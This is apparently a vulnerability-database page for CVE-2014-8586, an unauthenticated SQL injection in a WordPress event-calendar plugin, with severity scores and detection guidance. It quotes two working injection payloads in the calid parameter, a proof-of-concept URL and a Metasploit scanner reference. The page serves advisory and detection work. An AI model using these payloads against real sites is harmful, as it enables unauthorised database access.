CVE-2014-8586
published 2014-11-04CVE-2014-8586: SQL injection vulnerability in the CP Multi View Event Calendar plugin 1.01 for WordPress allows remote attackers to execute arbitrary SQL commands via the…
PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
40.09%
98.5th percentile
SQL injection vulnerability in the CP Multi View Event Calendar plugin 1.01 for WordPress allows remote attackers to execute arbitrary SQL commands via the calid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cp_multi_view_event_calendar_project | cp_multi_view_event_calendar | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcalid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)↗
commandcalid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#↗
- →Monitor GET requests targeting the WordPress CP Multi-View Event Calendar plugin endpoint with parameters cpmvc_do_action=mvparse, f=datafeed, method=list, and a suspicious calid parameter value (e.g., containing SQL keywords such as RLIKE, UNION, SELECT, BENCHMARK, AND/OR). ↗
- →Detect boolean-based blind SQLi attempts via RLIKE with CASE/WHEN constructs in the calid GET parameter. ↗
- →Detect error-based SQLi attempts using INFORMATION_SCHEMA.CHARACTER_SETS with FLOOR(RAND()) GROUP BY in the calid GET parameter. ↗
- →Detect UNION-based SQLi with 14 NULL columns in the calid GET parameter; the UNION query uses a 14-column schema specific to this plugin's datafeed query. ↗
- →Detect time-based blind SQLi via BENCHMARK(5000000,MD5(...)) in the calid GET parameter; heavy query causing measurable response delay. ↗
- →A Metasploit auxiliary scanner module exists for this vulnerability targeting unauthenticated SQL injection in CP Multi-View Calendar; watch for automated scanning patterns against the datafeed endpoint. ↗
- ·The vulnerability is unauthenticated — no WordPress login is required to exploit it, meaning perimeter WAF rules on the datafeed endpoint are the primary preventive control. ↗
- ·The calid parameter is entirely unsanitized; any integer-type allowlist enforcement on this parameter at the WAF/application layer will block all known attack vectors. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection
exploitdb·2014-10-27
CVE-2014-8586 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection
WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection
---
######################
# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
# Date : 2014-10-23
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability
calid variable is not sanitized.
######################
# PoC
http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli]
# Sqlmap
---
Place: GET
Parameter: calid
Type: boolean-based blind
Title: MySQL b
Metasploit
WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
metasploit
WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner
This module will scan given instances for an unauthenticated SQL injection within the CP Multi-View Calendar plugin v1.1.4 for Wordpress.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/113670http://packetstormsecurity.com/files/128814/WordPress-CP-Multi-View-Event-Calendar-1.01-SQL-Injection.htmlhttp://www.exploit-db.com/exploits/35073http://www.securityfocus.com/bid/70718https://exchange.xforce.ibmcloud.com/vulnerabilities/97766http://osvdb.org/show/osvdb/113670http://packetstormsecurity.com/files/128814/WordPress-CP-Multi-View-Event-Calendar-1.01-SQL-Injection.htmlhttp://www.exploit-db.com/exploits/35073http://www.securityfocus.com/bid/70718https://exchange.xforce.ibmcloud.com/vulnerabilities/97766
2014-11-04
Published